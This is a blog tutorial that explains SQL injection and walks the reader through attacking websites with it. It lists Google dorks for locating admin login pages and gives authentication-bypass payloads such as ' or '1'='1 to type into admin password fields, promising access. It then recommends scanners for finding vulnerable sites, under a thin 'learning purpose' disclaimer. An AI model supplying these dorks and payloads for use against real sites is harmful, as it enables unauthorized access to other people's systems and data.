What is SQL injection and how its accomplished!



A large number of websites are vulnerable to SQL injection attacks, I must say that its just the fault of the website admin, Who has designed it. I am going to discuss here that what is SQL injection and how it is accomplished. Now-a-days, many noobs find an SQL error in database by automated scanners and just exploit it for fun. But that is not a good act. Even i haven't used my skills for any bad purpose. This post is about those people who don't know that their website is actually vulnerable to such attack, also i am going to tell you that how its done and how to catch this vulnerability.Due to such vulnerability a Hacker can gain access to your website within a minute, Yes its true.

What is SQL Injection?
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
In simple words I must say that hacker injects certain characters in the admin authentication area and gains access as admin.

How is basic SQL injection Accomplished?
Google is very helping in hacking, due to dork technique, Now you will think that what is dork?
Dork: A search enquiry to find a website specific to an attack type etc.
A few dorks are below, which are used to find, vulnerable site:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
(Note: I am not giving all dorks, due to the fact that i might go illegal, You may be just learning but we can't trust everyone.)

These dorks are pasted in the search bar of google.com. and then searched to find the website.

After finding the required target, injection is accomplished, like in the login fields of admin, as password following injections are inserted:
' or '1'='1
' or 'x'='x
(Google to get more, It would be illegal if i post here all.)

In simple words:
Username : Admin
Password : 'or'1'='1

Hit login and you are in, All the sites are not vulnerable and this is just for learning purpose, HackersThirst is not responsible for any harm or damage caused.


That was just a simple tutorial to give you basic information of SQL injection. There are more advanced techniques too. But some other day i will discuss.


How to check that your website is vulnerable?
Well, After reading the basics above you might have got the concept of SQL injection. But many tools are also available to scan your website or server for such errors in database, Note, When error occurs it means that website is vulnerable.
First Method:
Here is an online scanner:
http://webhosting.blackoutaio.com/~sqli/
For example, If you want to scan, www.website-wamiq.com then put this in scanner bar:
inurl:php?=id+site:website-wamiq.com
 If you get:

http://www.website-wamiq.com/product.php?id='3 <== Success

Then it means that website is vulnerable and can be exploited easily by getting the number of colums.
(Note: catid, data, num is also used in addition to id. Simply replace id with your desired value in the dork of scanner.)
Here i got screen shot of a Website with dork "data" instead of "id" vulnerable to the attack it has scanned it overall and here are results:




Second Method:
Here is an automated scanner, Which is for newbies, Just click scan and take rest.
Go to this link to get detailed information on how to find SQL vulnerability in website.
To get Acunetix vulnerability scanner Trial version go here.


Hope, Now you might be aware of SQL injections. Futher information will be posted later.

Update:- Read Further Details below:-
How to Use Havij for SQL injection